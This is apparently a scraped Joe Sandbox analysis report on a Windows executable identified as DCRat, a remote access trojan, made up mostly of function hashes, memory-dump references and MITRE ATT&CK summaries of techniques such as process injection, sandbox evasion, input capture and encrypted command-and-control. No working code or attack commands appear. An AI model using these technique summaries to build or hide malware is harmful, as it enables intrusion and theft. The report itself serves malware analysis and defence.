Opcode Fuzzy Hash: 24e8c0c68232d0fc2e381c8db043503133ce93850664129b5b13be84ad80d28a
Instruction Fuzzy Hash: 45F065B2905248EFDB55EF74E9566DD77B8EF11348F004498D804A3291E7354F078792

Uniqueness

Uniqueness Score: -1.00%

Function 029C8678 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.254144638.00000000029C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29c0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70e35f0e47feb55c8a1d5860a0a9bf9c36c8f7441a8d6adde37e70f4c6f9f8e9
Instruction ID: 6a3e1db828956bcb06a924a8246dfc2864dbe2fd6cd26343705530ff6a926e35
Opcode Fuzzy Hash: 70e35f0e47feb55c8a1d5860a0a9bf9c36c8f7441a8d6adde37e70f4c6f9f8e9
Instruction Fuzzy Hash: FAF06575C09208EFC711EFB99A456AD7FF4EB05314F2055AAC88593391E7344A45CB42

Uniqueness

Uniqueness Score: -1.00%

Function 029C3C8F Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.254144638.00000000029C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29c0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f7101e462704a9eb51882934472d591d98f77b5138dbfc62b05dc1e7abc591b
Instruction ID: 2622f49e7fb247034f1344290ca756f481af5707e99f418dc5c555c57b4b9567
Opcode Fuzzy Hash: 2f7101e462704a9eb51882934472d591d98f77b5138dbfc62b05dc1e7abc591b
Instruction Fuzzy Hash: F6F0FF74E40208CFDB54CFA9D488AADBBB1BF08300F20849AE802FB360CB719844CF55

Uniqueness

Uniqueness Score: -1.00%

Function 029C3413 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.254144638.00000000029C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29c0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dcdde4a8b670cccad681d6460f31a9b143bdf0d3130b7a16d8fdb6b4835c730f
Instruction ID: 89d52062c88c2cff35527d22595a655e160ac0b6ae557a092470e388485cd04e
Opcode Fuzzy Hash: dcdde4a8b670cccad681d6460f31a9b143bdf0d3130b7a16d8fdb6b4835c730f
Instruction Fuzzy Hash: F0E0ED72A052889FCB42DFB4E5125AC7BB8EB06304B008499C449E32A1D6340E02D746

Uniqueness

Uniqueness Score: -1.00%

Function 029C6F39 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.254144638.00000000029C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29c0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0bf9ef9546d8a7eb472f28bb658c1dbd93bd3db1a214e69b529fe05efd775bf1
Instruction ID: 232ff0076faa1e2eff620c7bdc58079e74e05afb0ab2ab7b5a4378872203e7bd
Opcode Fuzzy Hash: 0bf9ef9546d8a7eb472f28bb658c1dbd93bd3db1a214e69b529fe05efd775bf1
Instruction Fuzzy Hash: 46F06C34E00218CFCB60DF65E848BADBBB5EB8A315F0054A6D50EA3250DB345E85CF02

Uniqueness

Uniqueness Score: -1.00%

Function 029CE622 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.254144638.00000000029C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29c0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c12db2a6693289cb5494560b12175c04c985e60434eb2e4d5492af0d2fd8d1f
Instruction ID: ebd16d383e010e1de1e0b555bc7d73370db298457bd24ca7b643036324b45b0c
Opcode Fuzzy Hash: 7c12db2a6693289cb5494560b12175c04c985e60434eb2e4d5492af0d2fd8d1f
Instruction Fuzzy Hash: 64E03930A00245DFEF109FA1D84D7ACBB71AB88205F24081FE403E23A0EF780485CB12

Uniqueness

Uniqueness Score: -1.00%

Function 029C0861 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.254144638.00000000029C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29c0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b614f89509108a9388ef50a294b8154d95b4bc0375a649debfc9470592e182a
Instruction ID: 608154d16a26a8989c2895eed88f570878022417bc5abca3d416564960ebf5b1
Opcode Fuzzy Hash: 2b614f89509108a9388ef50a294b8154d95b4bc0375a649debfc9470592e182a
Instruction Fuzzy Hash: E9E02230904209DFCB52EFB8EE51A9D7BB5EB42300F244699D008B72F0E7301B04CB11

Uniqueness

Uniqueness Score: -1.00%

Function 029C88D1 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.254144638.00000000029C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29c0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 034281d20a0d5947a9cacbb9ec99de57987b4a317411ec6da1a4980f1fe34024
Instruction ID: 531a48bf23cae8077342d5629ab21eb22fbfa7c6dccd7c3290ef713e9db4cecb
Opcode Fuzzy Hash: 034281d20a0d5947a9cacbb9ec99de57987b4a317411ec6da1a4980f1fe34024
Instruction Fuzzy Hash: C2E0C2B180A344AFC342EB64D829BA9BFB8EB03701F0111CDD758932E1DB354D46C74A

Uniqueness

Uniqueness Score: -1.00%

Function 029C8688 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.254144638.00000000029C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29c0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc5af47831c5eedf4173d4b91d3265d4c0a4b8b99c5e095f9f532653cb534d71
Instruction ID: 0de9fd82d0fc4f73db366e46430b36467dea81227afcaa7deca33e646fd7791b
Opcode Fuzzy Hash: dc5af47831c5eedf4173d4b91d3265d4c0a4b8b99c5e095f9f532653cb534d71
Instruction Fuzzy Hash: 06E04F75D08208EFCB40EFA996482ACBBF8EB08300F2054A99849A3350E7305A44DB81

Uniqueness

Uniqueness Score: -1.00%

Function 029C3420 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.254144638.00000000029C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29c0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c548fe9463151ef8f20c87b163e0a90546e8441bac2282a3040762204f5e84c8
Instruction ID: 39b22f54ddb79bec28af2d089c8ecb483f4a367d9dd18df51393290d2e0fe2ae
Opcode Fuzzy Hash: c548fe9463151ef8f20c87b163e0a90546e8441bac2282a3040762204f5e84c8
Instruction Fuzzy Hash: 41E04F7150024DDFCB41EFB9E505A5D7BF9EB05304F104598D509A3290DB355E009B45

Uniqueness

Uniqueness Score: -1.00%

Function 029C7530 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.254144638.00000000029C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29c0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ccd8cb7f4aa2b09c73738db2c86d56598cbd33d0f4f39a57c2732af0d9d5bf2
Instruction ID: e9f072be52c52b8b75bfc7e2a731d8f9063575af712954fcd5dc77f39eed0e93
Opcode Fuzzy Hash: 1ccd8cb7f4aa2b09c73738db2c86d56598cbd33d0f4f39a57c2732af0d9d5bf2
Instruction Fuzzy Hash: 7FE0867190420CEFDB50EFB8E505A9DB7BCEB45304F1048A8D508A3290EB315F00DB91

Uniqueness

Uniqueness Score: -1.00%

Function 029CCB68 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.254144638.00000000029C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29c0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d2573854f631eac8e7c8c26a2401ff39672eafbcc29d91175f5a24cd92fd9b9
Instruction ID: 648513bb6e0d6c7f828db822f1e8524171775d91a185a1372251d6fae0b0d61d
Opcode Fuzzy Hash: 1d2573854f631eac8e7c8c26a2401ff39672eafbcc29d91175f5a24cd92fd9b9
Instruction Fuzzy Hash: 9AE08671500209DFDB80EFF8E516A9D7BF9EB05304F10469CE408A7290DB316E04D751

Uniqueness

Uniqueness Score: -1.00%

Function 029C0870 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.254144638.00000000029C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29c0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65bbcdee77b63b9d2c4c02347101c64f2ed2a07fc13f65a871591393e8391d6e
Instruction ID: 415a8128341c7b35fc0304258cb320d332e8e900b60ee7d26786a7b35c69bce0
Opcode Fuzzy Hash: 65bbcdee77b63b9d2c4c02347101c64f2ed2a07fc13f65a871591393e8391d6e
Instruction Fuzzy Hash: F7E08671901109EFCB51EFB9E906A5D77B9EB45304F104568D40CA3390EB315F04DB91

Uniqueness

Uniqueness Score: -1.00%

Function 029C33D9 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.254144638.00000000029C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29c0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53497a839f7f05eb9bee666821de92931b17a79f7eb19a8dd671786033328948
Instruction ID: de3d6160135fd9a1fad4d81f4b70dce69e823677a43ddfed6fb72be3c028ce85
Opcode Fuzzy Hash: 53497a839f7f05eb9bee666821de92931b17a79f7eb19a8dd671786033328948
Instruction Fuzzy Hash: 2ED0C2728093894FD3125B20A9247183F28DB03325F0217DA8818A31E2CB2409048751

Uniqueness

Uniqueness Score: -1.00%

Function 029C88E0 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.254144638.00000000029C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29c0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a07a18012ad986b436b2dd914fd8aa7390419830f147ed2043027967a4c2e9dd
Instruction ID: 9f508c1ee099f6de6fd6bcb7ccb84b81a1f3be4ae38ffa5912968f2733abec69
Opcode Fuzzy Hash: a07a18012ad986b436b2dd914fd8aa7390419830f147ed2043027967a4c2e9dd
Instruction Fuzzy Hash: EBD0A770405209DFC341CF54D418E6EB7BCE702311F001198A418A33A0DB305D80C745

Uniqueness

Uniqueness Score: -1.00%

Function 029CF803 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.254144638.00000000029C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29c0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46b904b3a8d49909cf93f119da47448b6d895a6281e5c4b7f1cd985ec69d5331
Instruction ID: e937328a31a767eb8c43637b427a80a1c4958bff6db03a6943b9b5e53f608629
Opcode Fuzzy Hash: 46b904b3a8d49909cf93f119da47448b6d895a6281e5c4b7f1cd985ec69d5331
Instruction Fuzzy Hash: 7BD0123370841483E348226DB5093CF96EACBC8B24F6A8526E135D739DFEB58D0242D1

Uniqueness

Uniqueness Score: -1.00%

Function 029C0C90 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.254144638.00000000029C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29c0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a2f4169c2cff05a353389bd3f858a57eed915d3944f0fa6252441fe9b47ee3b
Instruction ID: 45af50f66383339cd1854df8011810e9c25846c552c8428150628ec1e2e64eae
Opcode Fuzzy Hash: 6a2f4169c2cff05a353389bd3f858a57eed915d3944f0fa6252441fe9b47ee3b
Instruction Fuzzy Hash: D1C01264A0A2C84FCF0207B162BA1E53FA0AA8721032480C2D4CD8F222C0204A4B9301

Uniqueness

Uniqueness Score: -1.00%

Function 029C33E8 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.254144638.00000000029C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29c0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c1ce0ec7aec11cb4115574c2fb4fb3399e23a6dca7c8aef3a0d0b93b2e33e1e
Instruction ID: 069d0e79aa13d8c0dc542c8fd908a2595555244d8894c52051d8809ec6232207
Opcode Fuzzy Hash: 7c1ce0ec7aec11cb4115574c2fb4fb3399e23a6dca7c8aef3a0d0b93b2e33e1e
Instruction Fuzzy Hash: 1EC0807140530DDFC3119F55B91D725776CD707316F4015D8940C53250DF314444C795

Uniqueness

Uniqueness Score: -1.00%

Function 029C16A0 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.254144638.00000000029C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29c0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 753bf64109aa9cd976720adb88d750dd47ba516e66ca7141088f6a40d1f8ec4a
Instruction ID: e99c5453947917b1c1c1ef3e8c26c686164e3e3e99e9cf554d65be001155a372
Opcode Fuzzy Hash: 753bf64109aa9cd976720adb88d750dd47ba516e66ca7141088f6a40d1f8ec4a
Instruction Fuzzy Hash: 47C08071405209DFC3109F55B918B65BB6CD707315F00165CA51C63390DB718444C795

Uniqueness

Uniqueness Score: -1.00%

Function 029C1748 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.254144638.00000000029C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29c0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a8c2455e10796abe2bb5a7dc47ca87e2e2aad4c4edb8d0464fd752d1789fc51
Instruction ID: a7065506eaa500f30dc2f9bbdcc82635af5675806c2fcec4e6263a86ad625cb7
Opcode Fuzzy Hash: 5a8c2455e10796abe2bb5a7dc47ca87e2e2aad4c4edb8d0464fd752d1789fc51
Instruction Fuzzy Hash: CEC08071405209DFC7109F55ED18726B76CD707315F101558D40C63250DB314404C796

Uniqueness

Uniqueness Score: -1.00%

Function 029CED19 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.254144638.00000000029C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29c0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f910c722b29f539c35b4b4d73f818437cd084f21332a4ad8a6dc2488c9e3e580
Instruction ID: 5b3c10bd98d2360064032998ea155ec2231fc321ce0cbfe0a37804bbe2f2d662
Opcode Fuzzy Hash: f910c722b29f539c35b4b4d73f818437cd084f21332a4ad8a6dc2488c9e3e580
Instruction Fuzzy Hash: 2AB01231108105CBF2094740C2142353635AB40300F61881CE08702480DB24BE01C702

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report a9rLzLY498.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: DCRat

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.log

\Device\ConDrv

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Imports

Network Behavior

TCP Packets

Windows Analysis Report
a9rLzLY498.exe

Function 01322540 Relevance: 49.3, APIs: 14, Strings: 14, Instructions: 255
nativethreadprocessCOMMON

Function 01337591 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73
COMMON

Function 01326967 Relevance: 9.1, APIs: 6, Instructions: 82
COMMON

Function 013228D0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 227
COMMON

Function 01321920 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43
COMMONLIBRARYCODE

Function 01334D51 Relevance: 4.5, APIs: 3, Instructions: 15
COMMONLIBRARYCODE

Function 0133AAE4 Relevance: 3.2, APIs: 2, Instructions: 191
fileCOMMONLIBRARYCODE

Function 0133A6E6 Relevance: 3.1, APIs: 2, Instructions: 80
fileCOMMONLIBRARYCODE

Function 01337CE4 Relevance: 3.1, APIs: 2, Instructions: 65
COMMON

Function 01328956 Relevance: 1.6, APIs: 1, Instructions: 107
COMMON

Function 0133765A Relevance: 1.6, APIs: 1, Instructions: 57
COMMONLIBRARYCODE

Function 01337322 Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMONLIBRARYCODE

Function 013269FC Relevance: 1.5, APIs: 1, Instructions: 33
COMMON

Function 01337E20 Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMONLIBRARYCODE

Function 01327341 Relevance: 1.5, APIs: 1, Instructions: 28
COMMON